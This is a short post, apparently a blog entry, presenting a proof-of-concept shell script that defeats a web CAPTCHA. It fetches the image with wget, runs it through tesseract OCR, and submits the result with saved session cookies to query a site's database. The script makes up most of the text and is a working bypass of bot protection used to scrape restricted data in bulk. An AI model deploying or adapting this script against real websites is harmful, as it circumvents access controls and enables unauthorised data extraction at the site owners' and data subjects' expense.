data:image/s3,"s3://crabby-images/f8565/f85658205b2d3ffeab6e385a3d8eb3eb1208376b" alt=""
You'll see, there is an OCR (optical character recognition softare) in Linux (tesseract) capable of "reading" the image given to the user, then this tool will write the characters to a text-file.
Using wget we can start http queries to a website, save and load cookies and write data to the filesystem. Putting it all together, we got a shellscript that will circumvent the captcha protection and extract the data in an automatic fashion (it's effective around 60%).
#!/bin/sh
wget http://www.somesite.com/jcaptcha --save-cookies cookies.txt --keep-session-cookies -O /tmp/captcha.jpg 2> /dev/null
djpeg -grayscale /tmp/captcha.jpg | convert - /tmp/captcha.tiff
tesseract /tmp/captcha.tiff jcaptcha
cap=`cat jcaptcha.txt`
wget "http://www.somesite.com/servlet?niv=&nrpv=&query=$somevalue&captcha=$cap" --load-cookies cookies.txt -O salida.txt 2> /dev/null
tam=`wc -c salida.txt| cut -c1-3`
echo $tam
if [ $tam -ne 701 ]; then
mv salida.txt $query.txt
fi
You may wonder why the script uses a length of 701 bytes to detect if the captcha has been defeated, well, it's just assuming the default "error" page has a length of 701 bytes, any other length it's assumed as info extracted from the database (ok, it's not the best approach, but it's just a PoC).